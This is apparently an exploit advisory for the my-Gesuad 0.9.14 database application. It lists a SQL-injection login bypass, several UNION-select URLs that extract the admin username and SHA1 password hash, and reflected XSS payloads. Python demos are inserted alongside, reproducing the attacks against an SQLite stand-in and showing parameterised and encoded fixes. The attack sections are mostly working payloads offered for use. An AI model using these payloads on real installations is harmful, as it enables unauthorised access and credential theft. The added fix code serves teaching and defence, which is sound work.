---------------------------------------------------------
MULTIPLE REMOTE VULNERABILITIES --my-Gesuad 0.9.14-->
---------------------------------------------------------

CMS INFORMATION:

-->WEB: http://www.collector.ch/drupal5/index.php
-->DOWNLOAD: http://www.collector.ch/drupal5/?q=node/11
-->DEMO: http://www.collector.ch/drupal5/?q=node/10
-->CATEGORY: Management
-->DESCRIPTION: Database application to manage applications...

-->RELEASED: 2009-03-24

CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORK: N/A
-->CATEGORY: AUTH BYPASS / SQL INJECTION / XSS
-->AFFECTED VERSION: 0.9.14 (maybe <= ?)
-->Discovered bug date: 2009-05-06
-->Reported bug date: 2009-05-06
-->Fixed bug date: 2009-05-07
-->Info patch: http://www.collector.ch/drupal5/?q=forum/15
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: To my girlfriend Marijose... my brother, sister-in-law, parents (and friends xD) for their support.
-->EXTRA-COMMENT: Thanks to all of you for putting up with me! (I love you, little one!)


#################
/////////////////

INTRODUCTION:

/////////////////
#################


This app is similar to mycolex v1.4.2, so it has similar vulnerabilities xD

#########################
////////////////////////

AUTH BYPASS (SQLi):

////////////////////////
#########################


<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>>

(With magic_quotes_gpc=On PHP would turn the ' in the payload into \' and the string literal would never close, so the bypass depends on it being off.)

----------
EXPLOIT:
----------

Name=' or 1=1#

password=123456 (over six characters; the value itself does not matter, the # comments the password comparison out of the query)

Then, go to http://[HOST]/[HOME_PATH]/modules/admuser.php?Modus=Find

We get the admin credentials...

Passwords are stored as MySQL SHA1() hashes (hashed, not encrypted), so a dumped value has to be cracked offline.

#########################
////////////////////////

SQL INJECTION (SQLi):

////////////////////////
#########################


<<<<---------++++++++++++++ Condition: be a registered user +++++++++++++++++--------->>>>

<<<<---------++++++++++++++ Condition: magic quotes = ON/OFF +++++++++++++++++--------->>>>

(The ID parameter is pasted into the query as a bare number, so the payload needs no quote and magic quotes give no protection.)

------------------
PROOF OF CONCEPT:
------------------


Some examples:

http://[HOST]/[HOME_PATH]/modules/kategorie.php?Modus=Detail&ID=1+and+0+union+all+select+1,version(),database()+sysuser%23

http://[HOST]/[HOME_PATH]/modules/budget.php?Modus=Detail&ID=5+AND+0+UNION+ALL+SELECT+1,database(),user(),4,5,6,7,8/*

http://[HOST]/[HOME_PATH]/modules/zahlung.php?Modus=Detail&ID=1+AND+0+UNION+ALL+SELECT+1,version()/*&Kontext=adresse

http://[HOST]/[HOME_PATH]/modules/adresse.php?Modus=Detail&ID=2+AND+0+UNION+ALL+SELECT+1,version(),database()%23&Kontext=ereignis

There are more...

Return: user, version, ...

(The AND 0 empties the page's own result set so the UNIONed row is what gets rendered; the number of columns in each payload matches the SELECT of the page being hit, and the trailing %23 or /* comments out whatever follows the ID in the original query.)


----------
EXPLOITS:
----------


http://[HOST]/[HOME_PATH]/modules/kategorie.php?Modus=Detail&ID=1+and+0+union+all+select+1,SuUser,SuPwd+FROM+sysuser+WHERE+SuID=1%23

http://[HOST]/[HOME_PATH]/modules/budget.php?Modus=Detail&ID=5+AND+0+UNION+ALL+SELECT+1,SuUser,SuPwd,4,5,6,7,8+FROM+sysuser+WHERE+SuID=1/*

Return: username and SHA1 password hash of the user with SuID=1
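The login bypass above and the UNION read through the ID parameter, modelled together as an added example (not code from this advisory or from my-Gesuad). The vulnerable queries are a hypothetical reconstruction of the shape the payloads imply, run against an in-memory SQLite database standing in for MySQL, with a constructed sysuser row; only the sysuser table and its SuID/SuUser/SuPwd columns come from the page, the kategorie table, the row data and the trailing ORDER BY that the comment marker cuts off are assumed. SQLite has no MySQL-style # comment, so the /* form of the page's payloads is used throughout.

```python
import hashlib
import sqlite3

# Constructed stand-in schema: sysuser and its columns are named on the page,
# kategorie and every row below are made up for the demo.
SCHEMA = """
CREATE TABLE sysuser (SuID INTEGER PRIMARY KEY, SuUser TEXT, SuPwd TEXT);
CREATE TABLE kategorie (KaID INTEGER PRIMARY KEY, KaName TEXT, KaText TEXT);
INSERT INTO kategorie VALUES (1, 'Sample category', 'constructed row');
"""

# The page's payloads in the /* form used against budget.php. SQLite, like
# MySQL, treats an unterminated /* as a comment running to end of input.
BYPASS_NAME = "' or 1=1/*"
DUMP_ID = "1 AND 0 UNION ALL SELECT 1,SuUser,SuPwd FROM sysuser WHERE SuID=1/*"


def sha1_hex(s):
    """Stand-in for MySQL SHA1(): hex digest of the UTF-8 bytes."""
    return hashlib.sha1(s.encode()).hexdigest()


def open_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    db.execute("INSERT INTO sysuser VALUES (1, ?, ?)", ("admin", sha1_hex("s3cret")))
    return db


def login_vulnerable(db, name, password):
    """Login query built by concatenation (assumed shape). With magic quotes
    off the quote in `name` closes the literal, 1=1 makes the WHERE true and
    the comment removes the password comparison."""
    q = ("SELECT SuID, SuUser FROM sysuser WHERE SuUser='%s' AND SuPwd='%s'"
         % (name, sha1_hex(password)))
    return db.execute(q).fetchone()


def login_fixed(db, name, password):
    """Same query with bound parameters: the quote is data, not syntax."""
    q = "SELECT SuID, SuUser FROM sysuser WHERE SuUser=? AND SuPwd=?"
    return db.execute(q, (name, sha1_hex(password))).fetchone()


def magic_quotes_query(name, password):
    """The text login_vulnerable would send with magic_quotes_gpc=On: PHP's
    addslashes() turns ' into \\', which MySQL reads as a literal quote, so
    the string never closes. Returned, not executed: SQLite does not treat
    backslash as an escape, so the bypass would still go through here."""
    escaped = name.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')
    return ("SELECT SuID, SuUser FROM sysuser WHERE SuUser='%s' AND SuPwd='%s'"
            % (escaped, sha1_hex(password)))


def detail_vulnerable(db, id_param):
    """kategorie.php?Modus=Detail&ID=... with ID pasted in as a bare number,
    so no quote is needed and magic quotes cannot help. AND 0 empties the
    real result; the UNION row (username, SHA1 hash) is what gets rendered.
    The ORDER BY is the assumed tail that the /* comments out."""
    q = ("SELECT KaID, KaName, KaText FROM kategorie WHERE KaID=%s ORDER BY KaID"
         % id_param)
    return db.execute(q).fetchall()


def detail_fixed(db, id_param):
    """Reject anything but digits before the value gets near the query."""
    if not str(id_param).isdigit():
        return []
    return db.execute("SELECT KaID, KaName, KaText FROM kategorie WHERE KaID=? "
                      "ORDER BY KaID", (int(id_param),)).fetchall()


if __name__ == "__main__":
    db = open_db()
    print("bypass   :", login_vulnerable(db, BYPASS_NAME, "123456"))
    print("bound    :", login_fixed(db, BYPASS_NAME, "123456"))
    print("dump     :", detail_vulnerable(db, DUMP_ID))
    print("validated:", detail_fixed(db, DUMP_ID))
```

The two fixes are the ones that actually close these bugs: bound parameters for string values, and a digits-only check (or an integer cast) for the ID before it is ever interpolated. Escaping alone, which is all magic quotes ever gave, does nothing for the numeric case.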


###########################
///////////////////////////

CROSS SITE SCRIPTING (XSS):

///////////////////////////
###########################


XSS is possible in practically every reflected parameter :P

Some examples (the payload is the page's alert('y3nh4ck3r+was+here!') in a script tag; where the value is reflected inside an HTML attribute a leading "> closes the attribute and the tag first):


http://[HOST]/[HOME_PATH]/modules/ereignis.php?Modus=List&Page=1"><script>alert('y3nh4ck3r+was+here!')</script>&Order=ErAnfangsdatum

http://[HOST]/[HOME_PATH]/modules/kategorie.php?Modus=Search&Kontext=objekt"><script>alert('y3nh4ck3r+was+here!')</script>

http://[HOST]/[HOME_PATH]/modules/image.php?image=<script>alert('y3nh4ck3r+was+here!')</script>

http://[HOST]/[HOME_PATH]/modules/sitzung.php?Modus=Detail&ID=1"><script>alert('y3nh4ck3r+was+here!')</script>


Of course there are more...
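The attribute-context reflection behind the ereignis.php example, as an added example that is not code from the advisory or from my-Gesuad. The pagination link is a constructed stand-in for whatever the list page really builds from Page and Order (only the parameter names come from the page, the HTML shape is assumed); the check counts how many script elements a parser actually sees, which is a stronger test than grepping for the payload string.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlencode

# The page's payload: "> closes the href attribute and the <a> tag, then the
# script element lands in the document body.
XSS_PAYLOAD = "\"><script>alert('y3nh4ck3r+was+here!')</script>"


def page_link_vulnerable(params):
    """Assumed shape of the vulnerable link: Page and Order are pasted into
    an href attribute with no encoding for either the URL or the HTML."""
    return ('<a href="ereignis.php?Modus=List&Page=%s&Order=%s">next</a>'
            % (params.get("Page", "1"), params.get("Order", "")))


def page_link_fixed(params):
    """One encoding per context the value passes through: urlencode for the
    query string, then html.escape(quote=True) for the attribute value."""
    query = urlencode({"Modus": "List",
                       "Page": params.get("Page", "1"),
                       "Order": params.get("Order", "")})
    return '<a href="%s">next</a>' % html.escape("ereignis.php?" + query, quote=True)


class ScriptCounter(HTMLParser):
    """Counts <script> start tags the way a browser's tokenizer would see them."""

    def __init__(self):
        super().__init__()
        self.scripts = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1


def script_elements(markup):
    """Number of script elements in the rendered markup; any value above the
    page's own baseline means an injected payload became live markup."""
    parser = ScriptCounter()
    parser.feed(markup)
    parser.close()
    return parser.scripts


if __name__ == "__main__":
    hostile = {"Page": "1" + XSS_PAYLOAD, "Order": "ErAnfangsdatum"}
    print("vulnerable:", script_elements(page_link_vulnerable(hostile)))
    print("fixed     :", script_elements(page_link_fixed(hostile)))
```

The same two-step encoding applies to the kategorie.php, sitzung.php and image.php cases: the reflected value is first a URL component and then an attribute value (or text node), and each layer needs its own escaping rather than a single blacklist of characters.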



<<<-----------------------------EOF---------------------------------->>>ENJOY IT!




#######################################################################
#######################################################################
##*******************************************************************##
## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray ... ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: SPANISH H4ck3Rs community! ##
##*******************************************************************##
#######################################################################
#######################################################################